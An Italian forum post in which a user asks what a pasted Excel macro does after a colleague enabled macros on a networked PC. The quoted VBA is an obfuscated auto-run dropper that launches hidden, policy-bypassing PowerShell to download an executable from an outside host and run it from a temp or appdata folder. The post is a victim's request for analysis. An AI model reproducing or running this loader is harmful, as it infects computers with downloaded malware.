ciao, un mio collega ha scaricato un file excel, sul suo pc che è in rete, dopo averlo scansionato con l'antivirus, ma poi aprendolo credo abbia consentito l'uso delle macro.
ora, vi chiedo se avete idea di cosa combini questa macro, di cui riporto il listato qui sotto.
Devo essere preoccupato?
grazie, ciao
Paolo
Sub Workbook_Open()
If xlErrorBarTypeFixedValue > 0 Then
Shell "" + nubiss, O
End If
End Sub
Function nba()
nba = """"
End Function
Function zynodaf()
portog = Array("te" + "mp", "loc" + "alap" + "pda" + "ta", "ap" + "pd" + "ata", "EMAIL")
zynodaf = portog(capitalo(0, 0))
End Function
Private Function capitalo(ByVal FromLimit As Integer, ByVal ToLimit As Integer) As Integer
Randomize
randomNumber = Int((ToLimit - FromLimit) * Rnd) + FromLimit
capitalo = randomNumber
End Function
Function egoo()
egoo = "d /c" + nba
End Function
Function recviemo()
mutopp = Array(Timer(), Minute(Now), Minute(Now), "oP" + "r -e")
helliooo = Array(Timer(), "AS" + "S -W" + "i")
nagoyya = Array(Timer(), Day(Now), "DD" + "en ")
temzaas = Array(Timer(), Minute(Now), Timer(), Null, "uT" + "i B", Minute(Now), Timer(), Null)
citroen = Array(Timer(), "eLL " + "-N")
circuus = Array(Timer(), "owe" + "RS", Nothing, Timer())
dazzac = Array(Timer(), Nothing, Timer(), "RaC" + "t")
recviemo = "p" + circuus(1) + "h" + citroen(1) + "on" + "iN" + "Te" + dazzac(3) + "iv" + "E -N" + mutopp(3) + "xeC" + temzaas(4) + "yP" + helliooo(1) + "nD" + "O " + " hI" + nagoyya(2)
End Function
Function nubiss()
flattop = zynodaf
nubiss = "c" + "M" + egoo + recviemo + nba + "(.(\""{2}{0}{1}\"" -f'-o','bj" + "ect','new') (\""{1}{3}{5}{0}{2}{4}\"" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://34tfg4th.date/fmouse.exe','%" + flattop + "%.exe');&(\""{0}{2}{1}\""-f'star','ss','t-proce') '%" + flattop + "%.exe'" + nba + nba
End Function
Registrazione
